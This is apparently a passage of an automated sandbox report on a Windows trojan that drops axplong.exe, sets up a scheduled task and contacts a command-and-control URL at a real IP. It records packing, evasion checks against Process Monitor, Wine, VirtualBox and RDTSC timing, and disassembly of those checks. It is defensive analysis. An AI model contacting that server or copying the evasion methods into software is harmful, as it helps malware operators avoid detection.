Source: axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php_
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpa
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpj
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpk
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpm
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded15
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedC5
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedU5
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpp5
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpu
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpx
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpy
Source: axplong.exe, 00000006.00000002.3328635806.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpy1mb3JtLXVybGVuY29kZWQ=V

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_000FE440	6_2_000FE440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00133068	6_2_00133068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_000F4CF0	6_2_000F4CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00127D83	6_2_00127D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_0013765B	6_2_0013765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_000F4AF0	6_2_000F4AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00136F09	6_2_00136F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00138720	6_2_00138720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_0013777B	6_2_0013777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 6_2_00132BD0	6_2_00132BD0

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9974508259536785
Source: file.exe	Static PE information: Section: lstpvczs ZLIB complexity 0.9943476491520291
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9974508259536785
Source: axplong.exe.0.dr	Static PE information: Section: lstpvczs ZLIB complexity 0.9943476491520291

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@1/1

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 55%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1893888 > 1048576

Source: file.exe

Static PE information: Raw size of lstpvczs is bigger than: 0x100000 < 0x19cc00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.fb0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lstpvczs:EW;hyconjie:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lstpvczs:EW;hyconjie:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lstpvczs:EW;hyconjie:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lstpvczs:EW;hyconjie:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 3.2.axplong.exe.f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lstpvczs:EW;hyconjie:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lstpvczs:EW;hyconjie:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 6.2.axplong.exe.f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;lstpvczs:EW;hyconjie:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;lstpvczs:EW;hyconjie:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1dcf52 should be: 0x1d9d72
Source: file.exe	Static PE information: real checksum: 0x1dcf52 should be: 0x1d9d72

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: lstpvczs
Source: file.exe	Static PE information: section name: hyconjie
Source: file.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: lstpvczs
Source: axplong.exe.0.dr	Static PE information: section name: hyconjie
Source: axplong.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 6_2_0010D84C push ecx; ret

6_2_0010D85F

Source: file.exe	Static PE information: section name: entropy: 7.986442011081729
Source: file.exe	Static PE information: section name: lstpvczs entropy: 7.9538233396584435
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.986442011081729
Source: axplong.exe.0.dr	Static PE information: section name: lstpvczs entropy: 7.9538233396584435

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101F1F3 second address: 101F220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA387Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jmp 00007FB80CDA3885h 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 101F220 second address: 101EAD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FB80D16EFD6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f jnp 00007FB80D16EFDCh 0x00000015 push dword ptr [ebp+122D0C71h] 0x0000001b add dword ptr [ebp+122D19E1h], edi 0x00000021 call dword ptr [ebp+122D281Dh] 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D19F7h], edi 0x0000002e xor eax, eax 0x00000030 cld 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 jne 00007FB80D16EFE2h 0x0000003b je 00007FB80D16EFDCh 0x00000041 mov dword ptr [ebp+122D386Eh], eax 0x00000047 or dword ptr [ebp+122D18EDh], esi 0x0000004d mov esi, 0000003Ch 0x00000052 stc 0x00000053 add esi, dword ptr [esp+24h] 0x00000057 jmp 00007FB80D16EFE3h 0x0000005c or dword ptr [ebp+122D18EDh], ecx 0x00000062 lodsw 0x00000064 mov dword ptr [ebp+122D3467h], esi 0x0000006a add eax, dword ptr [esp+24h] 0x0000006e stc 0x0000006f add dword ptr [ebp+122D1984h], eax 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 clc 0x0000007a push eax 0x0000007b push eax 0x0000007c push edx 0x0000007d jmp 00007FB80D16EFDBh 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11918AE second address: 11918CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3885h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FB80CDA387Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11918CF second address: 11918D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1190865 second address: 1190889 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FB80CDA3878h 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FB80CDA387Ch 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007FB80CDA3876h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1190889 second address: 1190892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1190892 second address: 1190898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11909F1 second address: 11909F7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1190BF6 second address: 1190BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119432A second address: 11943AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007FB80D16EFD8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 jne 00007FB80D16EFDCh 0x0000002c jo 00007FB80D16EFDBh 0x00000032 adc si, 257Bh 0x00000037 push 00000000h 0x00000039 mov ecx, dword ptr [ebp+122D17FAh] 0x0000003f push 59D5A356h 0x00000044 push eax 0x00000045 push edx 0x00000046 jne 00007FB80D16EFEDh 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11943AC second address: 11943EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA387Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 59D5A3D6h 0x00000010 mov cl, A2h 0x00000012 push 00000003h 0x00000014 mov cx, 3400h 0x00000018 push 00000000h 0x0000001a sub di, C66Bh 0x0000001f add dx, 05CDh 0x00000024 push 00000003h 0x00000026 jns 00007FB80CDA3876h 0x0000002c call 00007FB80CDA3879h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push edi 0x00000036 pop edi 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11943EC second address: 11943FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80D16EFDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11943FE second address: 119445C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB80CDA3885h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jng 00007FB80CDA387Ch 0x00000011 jnp 00007FB80CDA3876h 0x00000017 pop esi 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c pushad 0x0000001d push ecx 0x0000001e jmp 00007FB80CDA3881h 0x00000023 pop ecx 0x00000024 jmp 00007FB80CDA387Ah 0x00000029 popad 0x0000002a mov eax, dword ptr [eax] 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FB80CDA387Eh 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119445C second address: 1194479 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnl 00007FB80D16EFD6h 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007FB80D16EFD6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1194479 second address: 119447F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119447F second address: 1194484 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1194484 second address: 11944B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 add esi, dword ptr [ebp+122D382Eh] 0x0000000e stc 0x0000000f lea ebx, dword ptr [ebp+12449204h] 0x00000015 mov esi, dword ptr [ebp+122D3942h] 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FB80CDA3883h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11944B7 second address: 11944BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11944BD second address: 11944C7 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB80CDA387Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 119453D second address: 1194543 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
